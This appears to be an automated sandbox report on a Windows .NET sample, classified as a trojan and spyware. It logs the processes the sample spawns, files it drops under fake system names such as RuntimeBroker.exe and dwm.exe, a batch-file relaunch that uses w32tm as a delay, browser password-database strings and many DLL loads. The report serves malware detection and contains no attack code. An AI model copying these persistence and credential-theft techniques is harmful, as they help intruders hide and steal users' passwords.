                              Source: jW5TA1J9Z1.exe, 00000025.00000002.2124845618.0000000003551000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
                              Source: jW5TA1J9Z1.exe, 00000029.00000002.2452868994.00000000031AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
                              Source: jW5TA1J9Z1.exe, 00000029.00000002.2452868994.00000000031A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
                              Source: jW5TA1J9Z1.exe, 00000029.00000002.2452868994.0000000003256000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
                              Source: jW5TA1J9Z1.exe, 00000029.00000002.2452868994.0000000003191000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
                              Source: jW5TA1J9Z1.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
                              Source: jW5TA1J9Z1.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: jW5TA1J9Z1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: MQYzEFytUKABjmoxvNTPTwUrcL.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: RuntimeBroker.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: MQYzEFytUKABjmoxvNTPTwUrcL.exe0.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: dwm.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: jW5TA1J9Z1.exe, EZlYGB3v2qc5R98kuh4.csCryptographic APIs: 'CreateDecryptor'
                              Source: jW5TA1J9Z1.exe, EZlYGB3v2qc5R98kuh4.csCryptographic APIs: 'CreateDecryptor'
                              Source: jW5TA1J9Z1.exe, EZlYGB3v2qc5R98kuh4.csCryptographic APIs: 'CreateDecryptor'
                              Source: jW5TA1J9Z1.exe, EZlYGB3v2qc5R98kuh4.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@32/503@2/1
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\vaQeWJTK.logJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_03
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-NUz87R2ScA5J4vD9Ssui
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\AppData\Local\Temp\2vh3op5qJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat"
                              Source: jW5TA1J9Z1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: jW5TA1J9Z1.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: TIScuAaN1v.23.dr, olnkmN3XQm.23.dr, Zu952VkIBn.23.dr, 4BeU2bjjLT.23.dr, nbp0F8Sa2i.23.dr, aZkrsx4ZZo.23.dr, c7TI10ZHHS.23.dr, wdk8lRYvVI.23.dr, fSHVRg42Bm.23.dr, RHIwGCOMlB.23.dr, FsYjgL3fOA.23.dr, 0MJHK8fX4P.23.dr, 6FvNpGWoCU.23.dr, c9st6hDtgT.23.dr, 88Wf4dRN0m.23.dr, qR5Ry0gzsR.23.dr, FKutnMpkw2.23.dr, 5rBMoagqwi.23.dr, X2k4ZtTApE.23.dr, LQR34raBuq.23.dr, uGuBI2G8Ex.23.dr, TrwukxifuV.23.dr, 7LBVXVazVp.23.dr, lCd10Cnu1w.23.dr, H13C6SXPui.23.dr, OKmfjocFte.23.dr, sSFW1PISqQ.23.dr, mLlTG5aFXO.23.dr, LusCzzhjcg.23.dr, 5FNZ6uB5cA.23.dr, 8vvQYt4y8E.23.dr, 8SMTSUUt4O.23.dr, TjvKSuhddq.23.dr, TwQCSkGr2R.23.dr, cOapRkECG1.23.dr, CUL63doCnx.23.dr, Teak5OjKyF.23.dr, xHfETeDy1o.23.dr, ofavVCf9Hv.23.dr, TbpiBDU1OZ.23.dr, VDtfeHY1Kt.23.dr, WT6caEEUmG.23.dr, 2FOyLnkqSh.23.dr, PRViwV4G6z.23.dr, qaDh6VgPFP.23.dr, ysmNSNMNPI.23.dr, 3TQ3fG3Pkh.23.dr, czYY6EOiow.23.dr, Zkk236ugB1.23.dr, sKlvsqb8q4.23.dr, uWTPn2lZll.23.dr, 7sJM2vUI5W.23.dr, io8Y8r6h1q.23.dr, R7CnQZbCj7.23.dr, IATXV7jHcy.23.dr, 60wNxaMw7y.23.dr, e7sL11Pevu.23.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: jW5TA1J9Z1.exeReversingLabs: Detection: 73%
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile read: C:\Users\user\Desktop\jW5TA1J9Z1.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\jW5TA1J9Z1.exe "C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDF50.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC3376F6C86CE44268A97E49BC81EF4C9D.TMP"
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE4ED.tmp" "c:\Windows\System32\CSC6D3A6DCEBAC9465EA9FC90BCE51AABF4.TMP"
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\jW5TA1J9Z1.exe "C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                              Source: unknownProcess created: C:\Windows\DiagTrack\RuntimeBroker.exe "C:\Windows\DiagTrack\RuntimeBroker.exe"
                              Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
                              Source: unknownProcess created: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe "C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
                              Source: unknownProcess created: C:\Users\user\Desktop\jW5TA1J9Z1.exe "C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                              Source: unknownProcess created: C:\Windows\DiagTrack\RuntimeBroker.exe "C:\Windows\DiagTrack\RuntimeBroker.exe"
                              Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
                              Source: unknownProcess created: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe "C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
                              Source: unknownProcess created: C:\Users\user\Desktop\jW5TA1J9Z1.exe "C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                              Source: unknownProcess created: C:\Windows\DiagTrack\RuntimeBroker.exe "C:\Windows\DiagTrack\RuntimeBroker.exe"
                              Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
                              Source: unknownProcess created: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe "C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
                              Source: unknownProcess created: C:\Users\user\Desktop\jW5TA1J9Z1.exe "C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat" Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDF50.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC3376F6C86CE44268A97E49BC81EF4C9D.TMP"Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE4ED.tmp" "c:\Windows\System32\CSC6D3A6DCEBAC9465EA9FC90BCE51AABF4.TMP"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\jW5TA1J9Z1.exe "C:\Users\user\Desktop\jW5TA1J9Z1.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: rtutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: mmdevapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: devobj.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ksuser.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: avrt.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: audioses.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: msacm32.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: midimap.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: dwrite.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: mscoree.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: apphelp.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: version.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: wldp.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: profapi.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: apphelp.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: wldp.dll
